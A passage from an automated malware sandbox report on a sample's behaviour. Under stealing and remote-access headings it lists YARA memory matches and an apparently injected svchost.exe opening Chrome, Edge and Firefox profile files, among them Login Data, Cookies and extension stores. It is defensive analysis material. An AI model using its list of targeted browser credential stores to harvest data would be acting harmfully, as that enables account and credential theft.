            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\SysWOW64\dllhost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Windows\Temp\user-PC-20250307-1017.log VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000016.00000002.1910501136.0000000005730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1892438127.0000000003503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1892438127.0000000003363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1902242469.0000000005640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.1887780167.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1889471588.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1891908767.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1903144848.0000000005933000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main\ms-language-packs\browser
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\startupCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\thumbnails
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\m8f4v4pw.default
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cache2
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\safebrowsing\google4
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cache2\entries
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\safebrowsing
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cache2\doomed
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main\ms-language-packs
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\sp4c0p22.default-release\settings\main\ms-language-packs\browser\newtab
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\a73433f1-0ec0-4d76-ad13-7ef016f8a256
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mdpkiolbdkhdjpekfbkbmhigcaggjagi\Icons Monochrome
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
            Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db
            Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000016.00000002.1910501136.0000000005730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1892438127.0000000003503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1892438127.0000000003363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1902242469.0000000005640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.1887780167.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1889471588.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1891908767.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
